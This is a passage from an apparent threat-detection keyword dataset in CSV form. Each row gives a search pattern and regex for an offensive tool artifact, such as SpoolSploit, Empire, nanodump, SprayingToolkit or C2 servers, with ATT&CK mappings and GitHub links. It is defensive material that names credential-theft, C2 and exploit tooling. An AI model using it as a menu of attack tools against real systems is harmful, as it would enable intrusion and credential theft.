TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SpecterOps/Nemesis*",".{0,1000}SpecterOps\/Nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Spel_RCE_Bash_EXP.py*",".{0,1000}Spel_RCE_Bash_EXP\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*Spel_RCE_POC.py*",".{0,1000}Spel_RCE_POC\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*spiderfoot -l 127.0.0.1:*",".{0,1000}spiderfoot\s\-l\s127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*spiderfoot-cli -s http*",".{0,1000}spiderfoot\-cli\s\-s\shttp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-SpiderFoot-correlations.csv*",".{0,1000}\-SpiderFoot\-correlations\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*spiderfoot-master*",".{0,1000}spiderfoot\-master.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" 
"*SpiderLabs/DoHC2*",".{0,1000}SpiderLabs\/DoHC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*SpiderLabs/Responder*",".{0,1000}SpiderLabs\/Responder.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*spindrift.py *--target *",".{0,1000}spindrift\.py\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spindrift.py --domain*",".{0,1000}spindrift\.py\s\-\-domain.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*Spins up catspin using Api Gateway proxy*",".{0,1000}Spins\sup\scatspin\susing\sApi\sGateway\sproxy.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*",".{0,1000}sploitus\.com\/exploit\?id\=6C1081C5\-7938\-5E83\-9079\-719C1B071FB5.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*splunk/upload_app_exec/*",".{0,1000}splunk\/upload_app_exec\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*splunk_whisperer.py*",".{0,1000}splunk_whisperer\.py.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*splunk_whisperer-master*",".{0,1000}splunk_whisperer\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*SplunkWhisperer2-master*",".{0,1000}SplunkWhisperer2\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*-spn * -clsid * 
-shadowcred*",".{0,1000}\-spn\s.{0,1000}\s\-clsid\s.{0,1000}\s\-shadowcred.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*SPN:SharpRoast.exe*",".{0,1000}SPN\:SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*spnroast_*.txt*",".{0,1000}spnroast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*spoof.py *.dll*",".{0,1000}spoof\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*spoof_wani*",".{0,1000}spoof_wani.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" 
"*spoof_wlan_creds*",".{0,1000}spoof_wlan_creds.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*--spoof-callstack *",".{0,1000}\-\-spoof\-callstack\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SpooferHostsIgnore*",".{0,1000}SpooferHostsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferHostsReply*",".{0,1000}SpooferHostsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIP*",".{0,1000}SpooferIP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIPsIgnore*",".{0,1000}SpooferIPsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIPsReply*",".{0,1000}SpooferIPsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferLearningDelay*",".{0,1000}SpooferLearningDelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferLearningInterval*",".{0,1000}SpooferLearningInterval.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferRepeat*",".{0,1000}SpooferRepeat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*",".{0,1000}SPOOFING\sGROUP\sPOLICY\sTEMPLATE\sLOCATION\sTHROUGH\sgPCFileSysPath.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Spoofy/spoofy.py*",".{0,1000}Spoofy\/spoofy\.py.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SpookFlare*",".{0,1000}SpookFlare.{0,1000}","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","943","190","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z" "*spookflare.py*",".{0,1000}spookflare\.py.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*spool_sploit.py*",".{0,1000}spool_sploit\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spooler_check*",".{0,1000}spooler_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*SpoolSample.exe * *",".{0,1000}SpoolSample\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*SpoolSample_v4.5_x64.exe*",".{0,1000}SpoolSample_v4\.5_x64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SpoolSploit/*",".{0,1000}SpoolSploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spoolsploit:latest*",".{0,1000}spoolsploit\:latest.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
